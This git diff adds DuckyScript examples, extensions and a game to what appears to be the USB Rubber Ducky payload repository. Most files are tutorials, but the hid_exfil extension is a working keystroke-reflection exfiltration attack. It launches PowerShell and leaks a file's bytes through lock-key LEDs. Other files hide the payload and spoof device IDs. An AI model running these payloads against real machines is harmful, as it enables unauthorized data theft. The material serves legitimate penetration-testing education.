
1
payloads/examples/Lock Keys/Lock-Keys-example1.txt Normal file
View File

@ -0,0 +1 @@
ATTACKMODE HID STORAGE LED_OFF DELAY 2000 WHILE TRUE LED_R WAIT_FOR_CAPS_CHANGE LED_G WAIT_FOR_CAPS_CHANGE END_WHILE REM Pressing the caps lock key on the target will cycle the USB Rubber Ducky LED between red and green.

1
payloads/examples/Lock Keys/Lock-Keys-example2.txt Normal file
View File

@ -0,0 +1 @@
REM Example SAVE and RESTORE of of the Keyboard Lock State ATTACKMODE HID STORAGE DELAY 2000 SAVE_HOST_KEYBOARD_LOCK_STATE $_RANDOM_MIN = 1 $_RANDOM_MAX = 3 VAR $TIMER = 120 WHILE ($TIMER > 0) VAR $A = $_RANDOM_INT IF ($A == 1) THEN CAPSLOCK ELSE IF ($A == 2) THEN NUMLOCK ELSE IF ($A == 3) THEN SCROLLLOCK END_IF DELAY 50 $TIMER = ($TIMER - 1) END_WHILE RESTORE_HOST_KEYBOARD_LOCK_STATE REM At the beginning of the payload, the currently reported keyboard lock state are saved. REM For about 6 seconds, as a while loop iterates 120 times with a 50 ms delay, the caps, num or scroll lock keys will be randomly pressed. REM When the "keyboard fireworks" display has concluded, the previously saved keyboard lock state will be restored. REM Meaning, if the target has caps lock off, scroll lock off, and num lock on before the payload began, so too would it after its conclusion.

1
payloads/examples/Lock Keys/Lock-Keys-example3.txt Normal file
View File

@ -0,0 +1 @@
REM Example Blink green if LED states are reported, REM otherwise blink red. ATTACKMODE HID STORAGE DELAY 2000 FUNCTION BLINK_RED() WHILE TRUE LED_OFF DELAY 50 LED_R DELAY 50 END_WHILE END_FUNCTION FUNCTION BLINK_GREEN() WHILE TRUE LED_OFF DELAY 50 LED_G DELAY 50 END_WHILE END_FUNCTION IF ($_RECEIVED_HOST_LOCK_LED_REPLY == TRUE) THEN BLINK_GREEN() ELSE IF ($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) THEN BLINK_RED() END_IF REM The USB Rubber Ducky will blink green if the LED states are reported by the target. Otherwise, the LED will blink red.

2
payloads/examples/Lock Keys/Lock-Keys-example4.txt Normal file
View File

@ -0,0 +1,2 @@
REM Example ONLY CAPS FOR YOU (Evil Prank) ATTACKMODE HID STORAGE DELAY 2000 WHILE TRUE IF ($_CAPSLOCK_ON == FALSE) THEN CAPSLOCK END_IF DELAY 100 END_WHILE REM If caps lock is turned off by the user, it will be turned on by the USB Rubber Ducky.
REM @Hak5Darren loves this prank.

4
payloads/examples/Loops/Loops-example1.txt Normal file
View File

@ -0,0 +1,4 @@
REM Example while loop - blink LED 42 times VAR $FOO = 42 WHILE ( $FOO > 0 ) LED_G DELAY 500 LED_OFF DELAY 500 $FOO = ( $FOO - 1 ) END_WHILE LED_R
REM The variable $FOO is set to 42. REM The WHILE loop begins, evaluating the condition "is $FOO greater than 0". REM Every time the condition is TRUE, the block of code between WHILE and END_WHILE will run. REM The LED will blink green: half a second on, half a second off. REM The variable $FOO will decrement by one. REM Once $FOO reaches zero, the WHILE condition will no longer evaluate to TRUE. The payload will continue execution after the END_WHILE statement, where the LED will light red. REM If the button is pressed at any time during the payload execution, the WHILE loop will end and the USB Rubber Ducky will enter ATTACKMODE STORAGE since that is the default behavior when no BUTTON_DEF has been initiated.

1
payloads/examples/Loops/Loops-example2.txt Normal file
View File

@ -0,0 +1 @@
REM Example while loop - press the button 5 times VAR $FOO = 5 WHILE ( $FOO > 0 ) STRINGLN Press the button... WAIT_FOR_BUTTON_PRESS $FOO = ( $FOO - 1 ) END_WHILE STRINGLN You pressed the button 5 times! REM The variable $FOO is set to 5. REM The code block within the WHILE loop will be repeated until the expression evaluates to FALSE. REM For each run of the code block, the message "Press the button..." is typed. The payload then waits until it detects the button is pressed, at which point the variable $FOO is decremented.

1
payloads/examples/Loops/Loops-example3.txt Normal file
View File

@ -0,0 +1 @@
REM Example Infinite Loop BUTTON_DEF WHILE TRUE LED_R DELAY 500 LED_OFF DELAY 500 END_WHILE END_BUTTON WHILE TRUE LED_G DELAY 500 LED_OFF DELAY 500 END_WHILE REM Because a button definition has been initiated with BUTTON_DEF, the default behavior will no longer apply when the button is pressed. REM The LED will blink green: half a second on, half a second off. REM Pressing the button will stop the currently infinite loop of blinking the LED green and execute the button definition, thus blinking the LED red.

1
payloads/examples/Operators/Operators-example1.txt Normal file
View File

@ -0,0 +1 @@
REM Assign $FOO to 42 VAR $FOO = 42 REM The variable is now 42. REM Lets add it by 1. $FOO = ( $FOO + 1 ) REM The variable is now 43: the sum of 42 and 1. REM Lets subtract it by 1. $FOO = ( $FOO - 1 ) REM The variable is now 42 (again): REM the difference of 42 and 1. REM Lets multiply it by 2. $FOO = ( $FOO * 2 ) REM The variable is now 84: REM the product of 42 and 2. REM Lets divide it by 2. $FOO = ( $FOO / 2 ) REM The variable is now 42 (again): REM the quotient of 82 and 2. REM Lets modulus it by 4. $FOO = ( $FOO % 4 ) REM The variable is now 2: REM the signed remainder of 42 and 4. REM Lets raise it to the power of 6. $FOO = ( $FOO ^ 6 ) REM Our variable is now 64: REM the exponent of 2 and 6.

1
payloads/examples/Operators/Operators-example2.txt Normal file
View File

@ -0,0 +1 @@
REM The order of operations (order precedence) are a set of rules that define which procedures are performed first in order to evaluate an expression, similar to that of mathematics. REM In DuckyScript, parenthesis ( ) are required to define the precedence conventions. VAR $FOO = ( 4 * 10 ) + 2 REM The expression ( 4 * 10 ) evalues to 40. REM The expression 40 + 2 evalues to 42. REM If multiple pairs of parentheses are required, the parentheses can be nested. VAR $FOO = 42 VAR $BAR = (( 100 * 13 ) + ( $FOO - 5 )) REM The expression 42 - 5 evalues to 37 REM The expression ( 100 * 13 ) evalues to 1300 REM The expression 1300 + 37 evalues to 1337

1
payloads/examples/Operators/Operators-example3.txt Normal file
View File

@ -0,0 +1 @@
REM Bitwise operators are operators which operate on the uint16 values at the binary level. ATTACKMODE HID STORAGE VID_05AC PID_021E VAR $FOO = $_CURRENT_VID REM Because VID/PID parameters are little endian, $FOO = ((($FOO >> 8) & 0x00FF) | (($FOO << 8) & 0xFF00)) REM $FOO will now equal 0xAC05 REM The value of $_CURRENT_VID is saved into the variable $FOO as AC05. REM Using bitwise operators its endianness is swapped to 05AC.

1
payloads/examples/Payload Control/Payload-Control-example1.txt Normal file
View File

@ -0,0 +1 @@
REM Example RESTART_PAYLOAD ATTACKMODE HID STORAGE DELAY 2000 STRINGLN Hello, World! RESTART_PAYLOAD STRINGLN Nothing to see here. REM The payload loop typing the "Hello, World!" line infinitely. REM The "Nothing to see here." string will never be typed.

1
payloads/examples/Payload Control/Payload-Control-example2.txt Normal file
View File

@ -0,0 +1 @@
REM Example STOP_PAYLOAD ATTACKMODE HID STORAGE DELAY 2000 BUTTON_DEF STOP_PAYLOAD END_BUTTON WHILE TRUE RANDOM_CHARACTER END_WHILE REM The payload will continuously type a random character. REM Pressing the button will stop the payload.

1
payloads/examples/Payload Control/Payload-Control-example3.txt Normal file
View File

@ -0,0 +1 @@
REM Example RESET ATTACKMODE HID STORAGE DELAY 2000 INJECT_MOD HOLD SHIFT HOLD a DELAY 700 RELEASE a RESET DELAY 1000 STRING nd reset REM On a Windows or Linux target, the payload may result in AAAAAAAAAAAAnd reset REM Notice that a RELEASE SHIFT command was omitted, and yet the nd reset string is lowercase. This is because the RESET command released all keys.

1
payloads/examples/Payload Hiding/Payload-Hiding-example1.txt Normal file
View File

@ -0,0 +1 @@
ATTACKMODE OFF BUTTON_DEF ATTACKMODE OFF RESTORE_PAYLOAD ATTACKMODE STORAGE END_BUTTON HIDE_PAYLOAD ATTACKMODE HID STORAGE DELAY 2000 STRING Nothing to see here... REM Upon first enumeration, the attached computer will not be able to see the inject.bin or seed.bin files on the USB Rubber Ducky storage. REM Pressing the button will re-enumerate the USB Rubber Ducky storage with both files visible once more.

6
payloads/examples/Randomization/Randomization-example1.txt Normal file
View File

@ -0,0 +1,6 @@
REM Example Random Keys ATTACKMODE HID STORAGE DELAY 2000 BUTTON_DEF RANDOM_CHARACTER END_BUTTON STRINGLN Here are 10 random lowercase letters: VAR $TIMES = 10 WHILE ($TIMES > 0) RANDOM_LOWERCASE_LETTER $TIMES = ($TIMES - 1) END_WHILE ENTER ENTER STRINGLN Here are 20 random numbers: VAR $TIMES = 20 WHILE ($TIMES > 0) RANDOM_NUMBER $TIMES = ($TIMES - 1) END_WHILE ENTER ENTER STRINGLN Here are 3 random special characters: RANDOM_SPECIAL RANDOM_SPECIAL RANDOM_SPECIAL STRINGLN Press the button for a random character:
REM This payload will type: REM 10 random lowercase letters, per the while loop. REM 20 random numbers, per the while loop. REM 3 random special characters.
REM The payload will then instruct the user to press the button. REM On each press of the button, the BUTTON_DEF will execute. REM This special functions contains the RANDOM_CHARACTER command, and thus a random character will be typed.

1
payloads/examples/Randomization/Randomization-example2.txt Normal file
View File

@ -0,0 +1 @@
REM Example Random Integer ATTACKMODE HID STORAGE LED_OFF VAR $A = $_RANDOM_INT WHILE ($A > 0) LED_G DELAY 500 LED_OFF DELAY 500 END_WHILE REM Each time this payload is executed, the LED will randomly blink between 1 and 9 times.

1
payloads/examples/Randomization/Randomization-example3.txt Normal file
View File

@ -0,0 +1 @@
REM Example Random Integer Example with Range ATTACKMODE HID STORAGE LED_OFF $_RANDOM_MIN = 20 $_RANDOM_MAX = 50 VAR $A = $_RANDOM_INT WHILE ($A > 0) LED_G DELAY 500 LED_OFF DELAY 500 END_WHILE REM Each time this payload is executed, the LED will blink a random number of times between 20 and 50.

5
payloads/examples/Randomization/Randomization-example4.txt Normal file
View File

@ -0,0 +1,5 @@
REM !!!! Use caution with random VID and PID values as unexpected results are likely !!!!
ATTACKMODE OFF WHILE TRUE ATTACKMODE HID VID_RANDOM PID_RANDOM MAN_RANDOM PROD_RANDOM SERIAL_RANDOM LED_R DELAY 2000 STRINGLN Hello, World! WAIT_FOR_BUTTON_PRESS LED_G END_WHILE
REM On each press of the button, the USB Rubber Ducky will re-enumerate as a new USB HID device with a random VID, PID, MAN, PROD and SERIAL. REM The string Hello, World! may be typed. REM Because VID and PID values may dictate device driver initialization, the USB Rubber Ducky may not be correctly enumerated as a Human Interface Device by the target OS.

2
payloads/examples/Storage Activity/Storage-Activity-example1.txt Normal file
View File

@ -0,0 +1,2 @@
REM !!!! Results may vary greatly depending on target OS. Some operating systems may keep storage active for an exceptionally long time. You may need to experiment with this feature to achieve the desired results for your given target. !!!!
REM Example WAIT_FOR_STORAGE_ACTIVITY Payload ATTACKMODE HID STORAGE DELAY 2000 LED_OFF STRINGLN Waiting for the disk to be read from or written to... $_STORAGE_ACTIVITY_TIMEOUT = 10000 WAIT_FOR_STORAGE_ACTIVITY LED_OFF LED_R REM The WAIT_FOR_STORAGE_ACTIVITY command blocks all further payload execution until activity on the USB Rubber Ducky storage has been detected. REM The LED will light red after storage activity has been detected.

2
payloads/examples/Storage Activity/Storage-Activity-example2.txt Normal file
View File

@ -0,0 +1,2 @@
REM !!!! Results may vary greatly depending on target OS. Some operating systems may keep storage active for an exceptionally long time. You may need to experiment with this feature to achieve the desired results for your given target. !!!!
REM Example WAIT_FOR_STORAGE_INACTIVITY Payload ATTACKMODE HID STORAGE DELAY 2000 LED_OFF GUI r DELAY 100 STRINGLN powershell "$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;echo $env:computername >> $m:\computer_names.txt" $_STORAGE_ACTIVITY_TIMEOUT = 10000 WAIT_FOR_STORAGE_INACTIVITY LED_OFF LED_R REM The LED will light red when the storage device becomes inactive.

1193
payloads/examples/Tests/test-suite.txt Normal file
View File

File diff suppressed because it is too large Load Diff

1
payloads/examples/Variables/VAR-example1.txt Normal file
View File

@ -0,0 +1 @@
REM In DuckyScript, variables are initiated using the VAR command. REM Example Integer Variable VAR $SPEED = 2000 REM Example Boolean (TRUE/FALSE or 1/0) VAR $BLINK = TRUE VAR $BLINK = 1 REM Unlike a constant (declared by DEFINE), a variable is appended with the dollar sign ("$") sigil. REM Constant string which may not change REM throughout the payload DEFINE FOO Hello, World! REM Variable integer which may change REM throughout the payload VAR $BAR = 1337 REM The constant FOO will always be replaced with the string "Hello, World!" throughout the payload. REM While the variable $BAR currently holds the value 1337, this may change throughout the payload — which will be detailed shortly by using operators.

24
payloads/extensions/hello_os.txt Normal file
View File

@ -0,0 +1,24 @@
EXTENSION HELLO_OS
VERSION 1.0
REM For use with OS_DETECT Extension
REM prints the OS determination
FUNCTION HELLO_OS()
IF ($_OS == WINDOWS) THEN
STRING Hello Windows!
ELSE IF ($_OS == MACOS) THEN
STRING Hello Mac!
ELSE IF ($_OS == LINUX) THEN
STRING Hello Linux!
ELSE IF ($_OS == IOS) THEN
STRING Hello iOS!
ELSE IF ($_OS == CHROMEOS) THEN
STRING Hello ChromeOS!
ELSE IF ($_OS == ANDROID) THEN
STRING Hello Android!
ELSE
STRING Hello World!
END_IF
END_FUNCTION
END_EXTENSION

66
payloads/extensions/hid_exfil.txt Normal file
View File

@ -0,0 +1,66 @@
EXTENSION HID_EXFIL
VERSION 1.0
REM Helpers for Keystroke Reflection data exfiltration
REM This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET:
REM Windows Hostthat supports powershell and SendKeys
REM USAGE:
REM Uncomment the function call below to run this extension inline
REM or call RUN_EXFIL() anywhere in your payload after the extension
REM DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
REM BEGIN EXTENSION OPTIONS
REM File on host machine to exfil using Keystroke Reflection attack
DEFINE TARGET_FILE C:\id.txt
REM if STORAGE_ON_SUCCESS TRUE - the device will automatically switch to ATTACKMODE STORAGE after
REM EXFIL has completed; this is useful in testing
DEFINE STORAGE_ON_SUCCESS FALSE
REM END EXTENSION OPTIONS
FUNCTION RUN_EXFIL()
REM Boot
LED_OFF
DELAY 500
REM Launch Windows RUN dialog
GUI R
DELAY 50
REM Launch powershell
STRING powershell
ENTER
DELAY 250
REM Save HOST's current lock state
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
REM Convert and reflect target file
STRING foreach($b in $(Get-Content "TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
ENTER
REM Listen for "EOF"
WAIT_FOR_SCROLL_CHANGE
REM Indicate SUCCESS on Device LED, Disable EXFIL mode
LED_G
$_EXFIL_MODE_ENABLED = FALSE
REM Restore HOST's lock state to original
RESTORE_HOST_KEYBOARD_LOCK_STATE
REM If configured, automatically change to ATTACKMODE STORAGE (useful in testing)
IF STORAGE_ON_SUCCESS {
ATTACKMODE STORAGE
}
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call RUN_EXFIL() anywhere in your payload after the extension
REM RUN_EXFIL()
END_EXTENSION

206
payloads/extensions/os_detect.txt Normal file
View File

@ -0,0 +1,206 @@
EXTENSION OS_DETECTION
VERSION 1.0
REM USB Rubber Ducky Host OS Detection
REM "Generic" OS detection at a high view is a "moving target"
REM results may vary greatly depending
REM on a combination of many "variables":
REM - number of testing stages
REM - specific devices and versions tested against
REM - number of systems testing for (scope)
REM - detection techniques (passive/invisible/active/hybrid)
REM - overall speed
REM - overall accuracy
REM TARGET:
DEFAULT - Windows, Mac, Linux
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
REM USAGE:
REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension
REM Place this extension and the DETECT_OS() before
REM you would like to first reference $_OS to execute payload code conditionally
REM DEPLOYMENT:
REM Plug Ducky into host
FUNCTION DETECT_OS()
REM BEGIN EXTENSION OPTIONS
DEFINE VERBOSE FALSE
DEFINE ADVANCED_DETECTION FALSE
DEFINE STARTUP_DELAY 1500
DEFINE RESTART_WAIT 1000
DEFINE OS_DETECT_MODE HID
DEFINE OS_DETECT_VID VID_05AC
DEFINE OS_DETECT_PID PID_021E
DEFINE WINDOWS_HOST_REQUEST_COUNT 2
DEFINE HOST_RESPONSE_TIMEOUT 1000
REM END EXTENSION OPTIONS
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
DELAY STARTUP_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN
IF ADVANCED_DETECTION THEN
STRING ADVANCED OS DETECT
ELSE
STRING OS DETECT
END_IF
ENTER
STRING test caps
END_IF
IF ($_CAPSLOCK_ON == FALSE) THEN
LED_R
CAPSLOCK
DELAY HOST_RESPONSE_TIMEOUT
END_IF
LED_OFF
IF VERBOSE THEN
ENTER
STRING test done
END_IF
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
IF VERBOSE THEN
ENTER
STRING received led response
END_IF
LED_G
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
IF VERBOSE THEN
ENTER
STRING prediction: Windows
END_IF
$_OS = WINDOWS
ELSE
IF VERBOSE THEN
ENTER
STRING prediction: Linux
END_IF
$_OS = LINUX
END_IF
ELSE
IF VERBOSE THEN
ENTER
STRING no led response
ENTER
STRING prediciton: MacOS
END_IF
$_OS = MACOS
END_IF
IF ADVANCED_DETECTION THEN
IF ( $_OS == LINUX ) THEN
IF VERBOSE THEN
ENTER
STRING soft reconnect
END_IF
ATTACKMODE OFF
DELAY RESTART_WAIT
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID
DELAY CONNECT_WAIT
IF VERBOSE THEN
ENTER
STRING reconnected
END_IF
IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN
ENTER
STRING caps led on
ENTER
STRING test numlock
END_IF
NUMLOCK
DELAY HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN
ENTER
STRING test done
END_IF
IF ($_NUMLOCK_ON == FALSE) THEN
IF VERBOSE THEN
ENTER
STRING no numlock led
ENTER
STRING prediciton: ChromeOS
END_IF
$_OS = CHROMEOS
ELSE
IF VERBOSE THEN
ENTER
STRING numlock led on
ENTER
STRING testing scrolllock
END_IF
SCROLLLOCK
DELAY HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN
ENTER
STRING test done
END_IF
IF ($_SCROLLLOCK_ON == TRUE) THEN
IF VERBOSE THEN
ENTER
STRING scrolllock led on
ENTER
STRING prediciton: Android
END_IF
$_OS = ANDROID
ELSE
IF VERBOSE THEN
ENTER
STRING no scrolllock reply
ENTER
STRING prediction: Linux
END_IF
$_OS = LINUX
END_IF
END_IF
END_IF
ELSE IF ($_OS == MACOS) THEN
IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN
ENTER
STRING caps led on
ENTER
STRING prediction: iOS
END_IF
$_OS = IOS
ELSE
IF VERBOSE THEN
ENTER
STRING no caps reply
ENTER
STRING prediction: MacOS
END_IF
$_OS = MACOS
END_IF
ELSE IF ($_OS == WINDOWS) THEN
IF VERBOSE THEN
ENTER
STRING Confident Windows Prediction
END_IF
$_OS = WINDOWS
END_IF
END_IF
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN
ENTER
STRING OS_DETECT complete
ENTER
END_IF
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension
REM DETECT_OS()
END_EXTENSION

47
payloads/extensions/protected_storage_mode.txt Normal file
View File

@ -0,0 +1,47 @@
EXTENSION PROTECTED_STORAGE_MODE
VERSION 1.0
REM Example hidden storage mode
REM Forces user to "padlock style" unlock storage mode by setting
REM the host's lock keys and pressing the duck button to "submit" a
REM combination three times.
REM The wrong combination will immediately fail silently.
REM The correct combination will trigger ATTACKMODE STORAGE and LED_G
REM TARGET:
REM Any host that will reflect CAPSLOCK,NUMLOCK, and SCROLLLOCK
REM USAGE:
REM BUTTON_DEF
REM STORAGE_PASSWORD_CHECK()
REM END_BUTTON
FUNCTION STORAGE_PASSWORD_CHECK()
VAR $ACCEPED = FALSE
LED_R
WAIT_FOR_BUTTON_PRESS
REM first combination ALL LOCKS OFF
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
STRING .
WAIT_FOR_BUTTON_PRESS
REM second combination ONLY CAPS ON
IF (($_CAPSLOCK_ON == TRUE) && ($_NUMLOCK_ON == FALSE) && ($_SCROLLLOCK_ON == FALSE)) THEN
STRING .
WAIT_FOR_BUTTON_PRESS
REM third combination ONLY NUM ON
IF (($_CAPSLOCK_ON == FALSE) && ($_NUMLOCK_ON == TRUE) && ($_SCROLLLOCK_ON == FALSE)) THEN
$ACCEPTED = TRUE
END_IF
END_IF
END_IF
IF $ACCEPTED THEN
LED_G
ATTACKMODE STORAGE
END_IF
END_FUNCTION
END_EXTENSION

218
payloads/extensions/translate.txt Normal file
View File

@ -0,0 +1,218 @@
EXTENSION TRANSLATE
VERSION 1.0
REM This extension acts as a library or collection of helper functions
REM to work with converting variables in your payloads.
REM WHY:
REM Of the many ways to get information about the state of your payload
REM is by injecting static strings effectively as debugging "printf's"
REM However, given the non-static nature of payloads using variables in
REM DuckyScript 3.0 - the ability to decode variables during payload
REM execution and "print" (inject) representations of their current state
REM can often be a critically helpful development and debugging tool.
REM Available Functions:
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
REM USAGE:
REM set $INPUT to desired var
REM call the correct translate_ function for the expected data type e.g.
REM VAR $myVar = 1234
REM $INPUT = $myVar
REM TRANSLATE_INT()
REM REM the above code will inject "1234"
REM BEGIN EXTENSION VARIABLES
DEFINE PRINT_INT 0
DEFINE PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = PRINT_INT
VAR $D = 0
VAR $IN = 0
VAR $INPUT = 0
VAR $MOD = 0
VAR $P = FALSE
VAR $NL = TRUE
REM END EXTENSION VARIABLES
REM REQUIRED for INT/HEX - convert int to char
FUNCTION PRINTDIGIT()
IF ($D == 0) THEN
STRING 0
ELSE IF ($D == 1) THEN
STRING 1
ELSE IF ($D == 2) THEN
STRING 2
ELSE IF ($D == 3) THEN
STRING 3
ELSE IF ($D == 4) THEN
STRING 4
ELSE IF ($D == 5) THEN
STRING 5
ELSE IF ($D == 6) THEN
STRING 6
ELSE IF ($D == 7) THEN
STRING 7
ELSE IF ($D == 8) THEN
STRING 8
ELSE IF ($D == 9) THEN
STRING 9
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
IF ($D == 10) THEN
STRING A
ELSE IF ($D == 11) THEN
STRING B
ELSE IF ($D == 12) THEN
STRING C
ELSE IF ($D == 13) THEN
STRING D
ELSE IF ($D == 14) THEN
STRING E
ELSE IF ($D == 15) THEN
STRING F
END_IF
ELSE
STRING ?
END_IF
END_FUNCTION
REM REQUIRED for INT/HEX- consumes a "character" / "place" from the input
FUNCTION CONSUME()
$D = 0
WHILE ($INPUT >= $MOD)
$D = ($D + 1)
$INPUT = ($INPUT - $MOD)
END_WHILE
IF (($D > 0) || ($P == TRUE)) THEN
$P = TRUE
PRINTDIGIT()
END_IF
END_FUNCTION
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a DECIMAL string representation
FUNCTION TRANSLATE_INT()
$DIGIT_PRINT_MODE = PRINT_INT
$P = FALSE
IF ( $INPUT >= 10000) THEN
$MOD = 10000
CONSUME()
END_IF
IF (($INPUT >= 1000) || ($P == TRUE)) THEN
$MOD = 1000
CONSUME()
END_IF
IF (($INPUT >= 100) || ($P == TRUE)) THEN
$MOD = 100
CONSUME()
END_IF
IF (($INPUT >= 10) || ($P == TRUE)) THEN
$MOD = 10
CONSUME()
END_IF()
$D = $INPUT
PRINTDIGIT()
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed boolean type and attempts to convert
REM and inject a BOOLEAN string representation
FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN
STRING TRUE
ELSE
STRING FALSE
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a HEX string representation
FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = PRINT_HEX
VAR $chars = 0
VAR $d1 = 0
VAR $d2 = 0
VAR $d3 = 0
VAR $d4 = 0
WHILE ($INPUT > 0)
IF ($chars == 0) THEN
$d1 = ($INPUT % 16)
ELSE IF ($chars == 1) THEN
$d2 = ($INPUT % 16)
ELSE IF ($chars == 2) THEN
$d3 = ($INPUT % 16)
ELSE IF ($chars == 3) THEN
$d4 = ($INPUT % 16)
END_IF
$chars = ($chars + 1)
$INPUT = ($INPUT / 16)
END_WHILE
VAR $i = 0
STRING 0x
IF ($chars == 0) THEN
STRING 0x0000
ELSE IF ($chars == 1) THEN
STRING 000
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 2) THEN
STRING 00
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 3) THEN
STRING 0
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 4) THEN
STRING 0
$D = $d4
PRINTDIGIT()
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a BINARY string representation
FUNCTION TRANSLATE_BINARY()
VAR $I = 16
WHILE ( $I > 0 )
$I = ($I - 1)
IF (($INPUT & 0x8000) == 0 ) THEN
STRING 0
ELSE
STRING 1
END_IF
$INPUT = ($INPUT << 1)
END_WHILE
IF $NL THEN
ENTER
END_IF
END_FUNCTION
END_EXTENSION

308
payloads/library/general/DuckyCave-Game/payload.txt Normal file
View File

@ -0,0 +1,308 @@
REM Title: Ducky Cave
REM Author: Hak5's Korben (@notkorben) w. tweaks by @Hak5Darren
REM Description: Do you have what it takes to be a Ducky Cave champion?
REM This incredible Keystroke Injection game for the new USB Rubber Ducky
REM shows off the power of DuckyScript 3.0 while testing your skills!
REM
REM Usage: Open notepad or similar, deploy payload.
REM Use CAPSLOCK to navigate randomly generated cave!
REM Post your score on Twitter to enter the points-don't-matter leaderboard!
REM
REM Note: Requires target which reflects lock keys & new USB Rubber Ducky
REM
ATTACKMODE HID STORAGE
LED_G
DELAY 1000
STRINGLN QUACK! Hello world!
ENTER
DELAY 1200
STRINGLN _ _ _ USB _ _ _
STRINGLN __(.)< __(.)> __(.)= Rubber >(.)__ <(.)__ =(.)__
STRINGLN \___) \___) \___) Ducky! (___/ (___/ (___/
ENTER
STRINGLN * Documentation: https://docs.hak5.org
STRINGLN * Community: https://community.hak5.org
STRINGLN * Payloads: https://payloads.hak5.org
DELAY 1200
ENTER
STRINGLN Press CAPSLOCK 5 times for fun! (Windows/Linux)
WAIT_FOR_CAPS_CHANGE
LED_OFF
WAIT_FOR_CAPS_CHANGE
LED_G
WAIT_FOR_CAPS_CHANGE
LED_OFF
WAIT_FOR_CAPS_CHANGE
LED_G
WAIT_FOR_CAPS_CHANGE
LED_R
STRINGLN ___ _ ___ _ _
STRINGLN | \ _ _ __| |___ _ / __|__ ___ _____ | | |
STRINGLN | |) | || / _| / / || | (__/ _` \ V / -_)|_|_|
STRINGLN |___/ \_,_\__|_\_\\_, |\___\__,_|\_/\___|(_)_)
STRINGLN |__/
DEFINE RIGHT 0
DEFINE LEFT 1
DEFINE GAME_MAX_WIDTH 40
DEFINE GAME_SPEED 50
VAR $mode = RIGHT
VAR $lock_state = FALSE
VAR $score = 0
VAR $running = TRUE
VAR $direction_changes = 0
VAR $D = 0
VAR $INPUT = 0
VAR $MOD = 0
VAR $P = FALSE
FUNCTION PRINTDIGIT()
IF ($D == 0) THEN
STRING 0
ELSE IF ($D == 1) THEN
STRING 1
ELSE IF ($D == 2) THEN
STRING 2
ELSE IF ($D == 3) THEN
STRING 3
ELSE IF ($D == 4) THEN
STRING 4
ELSE IF ($D == 5) THEN
STRING 5
ELSE IF ($D == 6) THEN
STRING 6
ELSE IF ($D == 7) THEN
STRING 7
ELSE IF ($D == 8) THEN
STRING 8
ELSE IF ($D == 9) THEN
STRING 9
ELSE
STRING ?
END_IF
END_FUNCTION
FUNCTION CONSUME()
$D = 0
WHILE ($INPUT >= $MOD)
$D = ($D + 1)
$INPUT = ($INPUT - $MOD)
END_WHILE
IF (($D > 0) || ($P == TRUE)) THEN
$P = TRUE
PRINTDIGIT()
END_IF
END_FUNCTION
FUNCTION TRANSLATE_INT()
$P = FALSE
IF ( $INPUT >= 10000) THEN
$MOD = 10000
CONSUME()
END_IF
IF (($INPUT >= 1000) || ($P == TRUE)) THEN
$MOD = 1000
CONSUME()
END_IF
IF (($INPUT >= 100) || ($P == TRUE)) THEN
$MOD = 100
CONSUME()
END_IF
IF (($INPUT >= 10) || ($P == TRUE)) THEN
$MOD = 10
CONSUME()
END_IF()
$D = $INPUT
PRINTDIGIT()
END_FUNCTION
